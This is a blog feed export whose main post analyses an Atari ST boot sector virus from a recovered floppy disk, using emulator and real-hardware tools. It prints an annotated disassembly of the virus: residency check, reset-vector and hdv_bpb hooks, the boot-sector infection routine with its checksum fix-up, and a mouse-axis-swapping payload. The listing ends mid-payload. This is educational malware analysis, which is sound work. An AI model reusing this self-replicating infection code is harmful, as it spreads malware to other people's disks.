tag:blogger.com,1999:blog-42204722037304255462024-02-18T18:51:09.687-08:00#Dr. Avalanche LabsAnalysis of malware that mainly affects Argentina and South America.@Dkavalanchehttp://www.blogger.com/profile/05803700040566483414noreply@blogger.comBlogger111125tag:blogger.com,1999:blog-4220472203730425546.post-70687688354207034892022-01-03T17:53:00.004-08:002022-01-03T17:53:53.963-08:00<p> Hi, I moved to <a href="https://medium.com/@Dkavalanche">medium</a>.... see you!!!</p><p><br /></p><p>HAPPY 2022!!!</p>tag:blogger.com,1999:blog-4220472203730425546.post-34594006386073773942021-12-30T19:10:00.011-08:002022-01-02T07:54:23.695-08:00ATARI ST Bootsector Virus<p><br /></p>
<p><span style="font-family: arial;">The first <a href="https://en.wikipedia.org/wiki/Boot_sector">boot sector viruses</a> appeared in the mid-to-late 80s, on what were then the first computers that could boot the OS from a floppy disk, such as the Atari ST, Commodore Amiga, IBM XT, etc.</span></p>
<p><span style="font-family: arial;">I remember when the infection payload message of the SCA Virus appeared on my Commodore Amiga.</span></p>
<p><br /></p>
<div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzEz0HNJNERbX5TzV-3PHRIC0-danhYUhLLESK0ExHHrICTsWu6RnLvky6Pzuy3XqUE8U5CsUXzaloSxysKZSrHtMg8XSXCtNxkO5Cug-fUCZSnlfAyG1dpKtk-qPD05CLNL1pMjmj2f8/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="1080" data-original-width="1920" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzEz0HNJNERbX5TzV-3PHRIC0-danhYUhLLESK0ExHHrICTsWu6RnLvky6Pzuy3XqUE8U5CsUXzaloSxysKZSrHtMg8XSXCtNxkO5Cug-fUCZSnlfAyG1dpKtk-qPD05CLNL1pMjmj2f8/w383-h216/image.png" width="383" /></a></span></div>
<div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;">From then on my curiosity about these topics began; at first it was a matter of analyzing them dynamically and using a disk editor to look in hexadecimal at the messages they were trying to display. It was with the arrival of BBSs that I was able to find more information, such as assembler source code or the binaries, but that is another story.</span></div>
<div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;">What these early viruses tried to do was replicate onto every disk inserted into the computer and perhaps show a message every now and then; some, but not all, carried a payload that erased data on the disks from a certain date or time onward, as in the case of <a href="https://en.wikipedia.org/wiki/Michelangelo_(computer_virus)">Michelangelo</a> on the PC.</span></div>
<span style="font-family: arial;"><br /><br /></span><p></p>
<p><span style="font-family: arial;">Some time ago I bought an Atari ST, and among the disks I was able to download I found an infected one, so the idea came up to analyze it the way I would have liked to back then.</span></p>
<p><span style="font-family: arial;">This analysis was done with a mix of the STEEM emulator and the real machine.</span></p>
<p><span style="font-family: arial;"><br /></span></p>
<p><span style="font-family: arial;">Using Virus Killer 2000 we can verify that the floppy carries a virus, and we can also dump the sector to a file, among other things.</span></p>
<p></p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuUDMXXWIwsGGcZSWHliStqOXjMm9dmE01Q94b6sthcrv-ZzLI-8sBHU2I0Xlvy5ZGCxUxl7A2Qt9nyLtHA2AjQnDOnvSt-vM8JJ4ZqCkoYCxwY7Hfm6_v89qNU2RP7xH3JVwbiWQr7wA/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="473" data-original-width="602" height="309" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjuUDMXXWIwsGGcZSWHliStqOXjMm9dmE01Q94b6sthcrv-ZzLI-8sBHU2I0Xlvy5ZGCxUxl7A2Qt9nyLtHA2AjQnDOnvSt-vM8JJ4ZqCkoYCxwY7Hfm6_v89qNU2RP7xH3JVwbiWQr7wA/w393-h309/image.png" width="393" /></a></div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;">With this program we can see which system variables this virus hooks: in this case it hangs off RESVECTOR, the RESET vector, in order to "survive" a warm reboot, and it also hooks the Hdv_BPB vector to monitor the state of the disk drive and trigger the infection routine.</span></div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA_IZlg6aDXr346DYPkZGrja0wuoF6rLBcgdDdzW8vMLFIt_tosF43mUHH0GLTt0oQt9zXA6iQh2C3uhpOLo6w-HRYc-LOTqQImk46-MWjTwZLSCU9Z6dlrL3hKcHnV7tP52e0GTf7Ibo/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="503" data-original-width="714" height="321" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA_IZlg6aDXr346DYPkZGrja0wuoF6rLBcgdDdzW8vMLFIt_tosF43mUHH0GLTt0oQt9zXA6iQh2C3uhpOLo6w-HRYc-LOTqQImk46-MWjTwZLSCU9Z6dlrL3hKcHnV7tP52e0GTf7Ibo/w457-h321/image.png" width="457" /></a></div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;">Here, a clean system.</span></div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOCggrM6gfLEP4wJr9N7RRKvejJXYKLCGlgU40Hv2ZHlXsgFsdTNSxB4dfYuJ89VSGL37cFsVW26DldU_kIYuCNJH_MZ52it3FS6b7KjBzss90ZHmX1BA3KqgxPdV_LX2-YQuwv5ck1YQ/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="473" data-original-width="708" height="311" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOCggrM6gfLEP4wJr9N7RRKvejJXYKLCGlgU40Hv2ZHlXsgFsdTNSxB4dfYuJ89VSGL37cFsVW26DldU_kIYuCNJH_MZ52it3FS6b7KjBzss90ZHmX1BA3KqgxPdV_LX2-YQuwv5ck1YQ/w465-h311/image.png" width="465" /></a></div>
<br />
<div style="text-align: left;"><span style="font-family: arial;">The boot sector seen with a disk editor.</span></div>
<div style="text-align: left;"><br /></div>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcQKwVT5YFZ-93yoTvd1f5KGVUJ9_ysV5TmEuCSzPh-W6As0RqcHEmjmzOwA9PZSrQjHRsbhUVTrIVTFwnBwA8Hkj62kxHwbqSezzHfL0usl_qAPjxRcRzYoAkYg_2eZxUeGsBHK6S_LQ/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="371" data-original-width="581" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcQKwVT5YFZ-93yoTvd1f5KGVUJ9_ysV5TmEuCSzPh-W6As0RqcHEmjmzOwA9PZSrQjHRsbhUVTrIVTFwnBwA8Hkj62kxHwbqSezzHfL0usl_qAPjxRcRzYoAkYg_2eZxUeGsBHK6S_LQ/w456-h291/image.png" width="456" /></a></div>
<br /><br />
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;">The executable code in the boot sector starts at offset $1E.</span></div>
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXAfPJjLbQ3Qe5vQik_x9zATZJ5smkwFIl6PnUGMvHtG1thqvtiChfwTEFwX5Ht3XapFZzUERrjXvw1P8_2E4Op6qOyodKS6GK1nZGnCPJsiOAA7zFeuHmskl5NU9ZCF4ZD2yUuRZ-wkI/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="723" data-original-width="782" height="392" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXAfPJjLbQ3Qe5vQik_x9zATZJ5smkwFIl6PnUGMvHtG1thqvtiChfwTEFwX5Ht3XapFZzUERrjXvw1P8_2E4Op6qOyodKS6GK1nZGnCPJsiOAA7zFeuHmskl5NU9ZCF4ZD2yUuRZ-wkI/w424-h392/image.png" width="424" /></a></div>
<br /><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaC_DCJQRDylZRnKVfdweAt1Di9KYlbQhJ1nXOSBXF5um7XjI1br2iC80yGq5aDUVgEasCmbEMXMjzhXry0I04eYLW8mYsjF0RwcGw18H0x7BEcCqbfEafW5MCAxfprHqhuLnG-uf2wns/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="545" data-original-width="858" height="306" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaC_DCJQRDylZRnKVfdweAt1Di9KYlbQhJ1nXOSBXF5um7XjI1br2iC80yGq5aDUVgEasCmbEMXMjzhXry0I04eYLW8mYsjF0RwcGw18H0x7BEcCqbfEafW5MCAxfprHqhuLnG-uf2wns/w482-h306/image.png" width="482" /></a></div>
<br /><br />
<div class="separator" style="clear: both; text-align: center;"><br /></div>
<div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;">Dump of the boot sector on the real machine using VirusKiller 2000 and Templemon.</span></div>
<br />
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen="" class="BLOG_video_class" height="328" src="https://www.youtube.com/embed/7QrY6J_bSN0" width="395" youtube-src-id="7QrY6J_bSN0"></iframe></div>
<div class="separator" style="clear: both; text-align: center;"><span style="font-family: arial;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;">The same can be done on the already infected machine with the EasyReader program, by going to memory location $140.</span></div>
<div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;"><i>This virus installs itself at memory address $0140 and stays resident; it tries to infect the boot sector of any disk inserted in drive A through hdv_bpb, and after 5 consecutive infections the payload activates, which consists of inverting the mouse's x/y axes.</i></span></div>
<div class="separator" style="clear: both; text-align: left;"><span style="font-family: arial;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">Analysis of the virus dump. 
</div><div class="separator" style="clear: both; text-align: left;"><br /></div><div class="separator" style="clear: both; text-align: left;">
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000140 MOVE.L <b>#$000000D6</b>,D3 263C 0000 <b>00D6 </b>Infection marker of the virus; D3 is also the word counter for the copy loop at $000180.</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000146 LEA $0140,A1 43F8 0140 Loads RAM address $140 into A1</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00014A LEA $000140(PC),A2 45FA FFF4 Loads into A2 the RAM address where the boot code started, $000140; in this case both are equal because the machine was already infected when it was dumped.</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00014E MOVE.L (A2),D2 2412</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000150 CMP.L (A1),D2 B491 Checks the infection marker (263C 0000 00D6)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000152 BEQ $00018E 6700 003A If the marker is already in memory, returns; if not, continues with the routine to install itself.</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000156 MOVE.L #$31415926,D0 203C 3141 5926 <b>resvalid </b>magic #$31415926, needed to jump through resvector / a check is made to see whether memory has already been sized (warm start).</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00015C CLR.L D1 4281</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00015E CMP.L $0426,D0 B0B8 0426 Checks whether this is a warm start; if it was not a reset, jumps to $00016A</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000162 BNE $00016A 6600 0006</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000166 MOVE.L $042A,D1 2238 042A <b>resvector </b>$42A: loads the reset vector (warm start) into D1</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00016A LEA $000190(PC),A0 41FA 0024 Points A0 at $000190; this is reached directly on a normal boot from disk A: (no warm start)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00016E MOVE.L D1,(A0) 2081 Saves the old reset vector from D1 at (A0)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000170 MOVE.L #$00000194,D2 243C 0000 0194 $00000194: start of the virus installation routine</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000176 MOVE.L D2,$042A 21C2 042A Hooks <b>RESVECTOR </b>(on a system reset the reset vector runs from $00000194)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00017A MOVE.L D0,$0426 21C0 0426 <b>RESVALID </b>: arms the reset so that the virus installation routine in <b>resvector </b>runs (persistence in memory)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/-------------COPY VIRUS TO MEMORY------------------------------------------------------/</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00017E MOVE.W (A2)+,(A1)+ 32DA Copies the virus into memory, from $xxxxx(PC) in A2 to address $0140 in A1</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000180 DBF D3,$00017E 51CB FFFC Loops until D3 ($D6 = 214) underflows</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/---------------------------------------------------------------------------------------/</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000184 MOVE.L #$FFFFFFFB,$02EA 21FC FFFF FFFB 02EA Initializes the infection counter at $02EA (see $00029A)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00018C BSR $0001F2 6164 Calls the subroutine at $0001F2</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00018E RTS 4E75 Return from subroutine</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/----------------------------------------------------------------------------------------/</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000190 ORI.B #$00,D0 0000 0000 Data, not code: the longword where the old reset vector is saved (see $00016E)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/RESVECTOR STARTS HERE - INSTALLATION ROUTINE IN MEMORY-------------------------------------/</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000194 MOVE.L $042E,A1 2278 042E phystop $80000: this is the end of physical RAM; $80000 on a 512K machine.</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000198 SUBA.L #$00008000,A1 93FC 0000 8000 $00008000 below phystop</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00019E SUBA.L #$00000200,A1 93FC 0000 0200 Reserves $200 bytes for the virus.</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001A4 MOVE.L A1,D1 2209</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001A6 MOVE.L #$12123456,(A1)+ 22FC 1212 3456 Writes a marker longword at the start of the reserved block</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001AC MOVE.L D1,(A1)+ 22C1</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001AE LEA $0001F2(PC),A3 47FA 0042</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001B2 LEA $00020E(PC),A4 49FA 005A</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001B6 MOVE.W (A3)+,(A1)+ 32DB</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001B8 CMPA.L A4,A3 B7CC</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001BA BLT $0001B6 6DFA Branch while A3 &lt; A4</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001BC LEA $000140(PC),A3 47FA FF82 Loads the start of the virus.</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001C0 MOVE.L A3,(A1)+ 22CB</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001C2 MOVE.L D1,A3 2641</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001C4 CLR.W D0 4240</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001C6 MOVE.W #$00FE,D2 343C 00FE Counter set to $FE</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001CA ADD.W (A3)+,D0 D05B Checksum over 255 words, accumulated with ADD; the value stays in D0 (source (A3), destination D0)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001CC DBF D2,$0001CA 51CA FFFC</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001D0 MOVE.W #$5678,D2 343C 5678</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001D4 SUB.W D0,D2 9440</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001D6 MOVE.W D2,(A3) 3682</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001D8 MOVE.L #$00000000,$0426 21FC 0000 0000 0426 Clears $0426 (resvalid)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001E0 MOVE.L $000190(PC),A1 227A FFAE</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001E4 CMPA.L #$00000000,A1 B3FC 0000 0000</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001EA BNE $0001F0 6600 0004</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001EE JMP (A6) 4ED6</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001F0 JMP (A1) 4ED1</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/-------------------------------------------------------------------------------------------/</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001F2 MOVE.L #$31415926,$0426 21FC 3141 5926 0426 $426 <b>resvalid </b>: if this magic value is found here, a reset jumps through the reset vector at address $42A.</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001FA MOVE.L $0472,D0 2038 0472 <b>Hdv_bpb </b>: determines and returns the BIOS parameter block, which holds the specifications of the floppy or hard disk. 
</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0001FE LEA $02E2,A0 41F8 02E2</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000202 MOVE.L D0,(A0) 2080 Saves the original Hdv_bpb vector at $02E2</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000204 LEA $020E,A0 41F8 020E</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000208 MOVE.L A0,$0472 21C8 0472 <b>Hdv_bpb </b>hooked to $020E</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00020C RTS 4E75</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/-------------------------------------------------------------------------------------------/</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00020E MOVE.W $0004(A7),D0 302F 0004 &lt;-------------- Hdv_bpb entry, reached on every disk change; D0 = drive number</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000212 CMP.W #$0002,D0 B07C 0002</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000216 BGE $0002E0 6C00 00C8 Drive number &gt;= 2: skip straight to the ROM handler</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/-----------<b>READ BOOT SECTOR: XBIOS function floprd </b>-----------------------------------------------/</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00021A MOVEM.L D1-D5/D7-A7,-(A7) 48E7 7DFF Saves registers</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00021E MOVE.W D0,D7 3E00</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000220 MOVE.L #$00000001,-(A7) 2F3C 0000 0001 Side 0 - Count 1 (0000 0001)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000226 MOVE.L #$00010000,-(A7) 2F3C 0001 0000 Sector 1 - Track 0 (0001 0000)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00022C MOVE.W D7,-(A7) 3F07 Device 0 - drive A</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00022E CLR.L -(A7) 42A7 Filler longword</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000230 LEA $04C6,A5 4BF8 04C6 _dskbufp ($4C6): pointer to the system disk buffer</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000234 MOVE.L (A5),A5 2A55</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000236 MOVE.L A5,A6 2C4D</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000238 MOVE.L A5,-(A7) 2F0D Buffer</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00023A MOVE.W #$0008,-(A7) 3F3C 0008</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00023E TRAP #14 4E4E <b> floprd read diskette</b></span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000240 ADDA.L #$00000014,A7 DFFC 0000 0014 Cleans the arguments off the stack</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000246 TST.W D0 4A40</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000248 BMI $0002DC 6B00 0092 Read error: give up</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00024C MOVE.W #$601C,(A5) 3ABC 601C Writes BRA.S to offset $1E at the start of the sector</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000250 ADDA.L #$0000001E,A5 DBFC 0000 001E Advances to the code area at offset $1E</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000256 LEA $000140(PC),A4 49FA FEE8</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00025A LEA $0002F0(PC),A3 47FA 0094</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00025E MOVE.W (A4)+,(A5)+ 3ADC Copies the virus body ($140 to $2F0) into the buffer</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000260 CMPA.L A3,A4 B9CB</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000262 BLT $00025E 6DFA</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000264 MOVE.L A6,A5 2A4E</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000266 MOVE.W #$00FE,D1 323C 00FE</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00026A MOVE.W #$1234,D0 303C 1234 Boot sector checksum $1234</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00026E SUB.W (A5)+,D0 905D</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000270 DBF D1,$00026E 51C9 FFFC</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000274 MOVE.W D0,(A5) 3A80 Stores the fix-up word so that the 256 words sum to $1234 and the sector is executable</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/------- INFECT DISK: XBIOS function flopwr ----------------------------------------------------/</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000276 MOVE.L #$00000001,-(A7) 2F3C 0000 0001 Side 0 - Count 1 (0000 0001)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00027C MOVE.L #$00010000,-(A7) 2F3C 0001 0000 Sector 1 - Track 0 (0001 0000)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000282 MOVE.W D7,-(A7) 3F07 Device 0 - drive A</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000284 CLR.L -(A7) 42A7</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000286 MOVE.L A6,-(A7) 2F0E Buffer</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000288 MOVE.W #$0009,-(A7) 3F3C 0009 Sets the function number to call XBIOS flopwr (write diskette sector)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00028C TRAP #14 4E4E Calls the XBIOS</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00028E ADDA.L #$00000014,A7 DFFC 0000 0014</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/------------------------------------------------------------------------------------/</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000294 TST.W D0 4A40 Tests whether a new disk was infected</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,000296 BMI $0002DC 6B00 0044 End of boot</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,00029A ADDI.L #$00000001,$02EA 06B8 0000 0001 02EA Adds 1 to $02EA (infection counter)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002A2 CMPI.L #$00000005,$02EA 0CB8 0000 0005 02EA Compares $02EA with 5 (when the in-memory counter reaches 5 infections the payload runs)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002AA BNE $0002DC 6600 0030 Branches if 5 infections have not been reached and finishes the normal boot</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002AE CLR.L $02EA 42B8 02EA Clears the infection counter</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/---- PAYLOAD - SWAPS THE MOUSE X/Y AXES ------------------------------------------------/</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002B2 MOVE.W #$0022,-(A7) 3F3C 0022 Sets the function number to call XBIOS <b>kbdvbase</b></span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002B6 TRAP #14 4E4E Calls the XBIOS function <b>kbdvbase</b>, which returns in D0 the address of the keyboard vector table (the keyboard chip also handles the joystick and mouse)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002B8 ADDQ.L #2,A7 548F Fixes up the stack</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002BA ADD.L #$00000010,D0 D0BC 0000 0010 Adds $00000010 to get the address of the mouse vector (mousevec, offset $10 of the table)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002C0 EXG D0,A0 C188</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">/-----INITMOUS: XBIOS call to initialize the mouse ------------------------------------------------/</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002C2 MOVE.L (A0),-(A7) 2F10 Pushes the mouse vector address obtained through <b>kbdvbase</b></span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002C4 PEA $0002E6(PC) 487A 0020 Pushes the address of the mouse parameter block at $0002E6</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002C8 MOVE.L #$00000001,-(A7) 2F3C 0000 0001 Low word 1: enables the mouse in relative mode (a 0 here would disable it); high word 0 is the XBIOS function number (initmous)</span></div>
<div class="separator" style="clear: both;"><span style="font-family: courier; font-size: xx-small;">!,0002CE TRAP #14 4E4E Calls the XBIOS</span></div>
